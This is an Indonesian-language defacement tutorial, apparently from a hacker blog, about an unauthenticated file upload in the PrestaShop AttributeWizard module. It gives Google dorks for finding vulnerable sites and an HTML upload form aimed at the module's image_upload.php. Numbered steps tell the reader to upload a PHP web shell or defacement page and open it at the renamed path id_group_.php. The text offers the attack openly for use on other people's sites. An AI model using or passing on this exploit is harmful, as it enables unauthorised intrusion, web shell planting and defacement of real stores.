Halo para defacer , kali ini gua akan sedikit share tentang Tutorial Deface Menggunakan Pretashop Attribute Upload

kita sudah tau metode prestashop sebelumnya, tapi kali ini metodenya agak sedikit berbeda dengan yang sebelumnya , oke langsung saja kita bahas

Bahan :

Shell
CSRF
Kopi
Pacar

#############################################################################

Google Dork :

inurl:/modules/attributewizard
inurl:modules/attributewizard/disable_json.php

(use ur briant ) 

Exploit :

/modules/attributewizard/image_upload.php

 contoh : www.site.com/modules/attributewizard/image_upload.php

CSRF :

<form method="POST" action="www.Target.com/modules/attributewizard/image_upload.php"
enctype="multipart/form-data">
<input type="file" name="userfiles" /><button>Hajar !</button>
</form>

Vulnerability: Akan Muncul tulisan ERROR

Step by Step :

1. Cari target ( bisa juga di images )

2. pilih salah satu web , lalu kita exploit

3. klo vuln , nanti akan ada tulisan ERROR (di pojok kiri atas )

4. masukan site tersebut ke CSRF ( www.site.com/modules/attributewizard/image_upload.php )

5. buka CSRF tadi, lalu upload Shell kalian ( ext shell .php )

6. kalau sukses , nanti akan keluar tulisan sukses . shell punyamu.php

7. akses shellnya akan berubah  menjadi

www.site.co.li/modules/attributewizard/img/id_group_.php 

8. jika tidak bisa di pasang shell . Upload saja Script Deface punya kalian, dan akses scriptnya juga sama

 ww.site.co.li/modules/attributewizard/img/id_group_.php

 

NB :Apapun nama shell kalian / Script Defacean kalian akan berubah jadi id_group_.php 

 

Semoga Bermanfaat

@Sumber : TKJ Cyber 71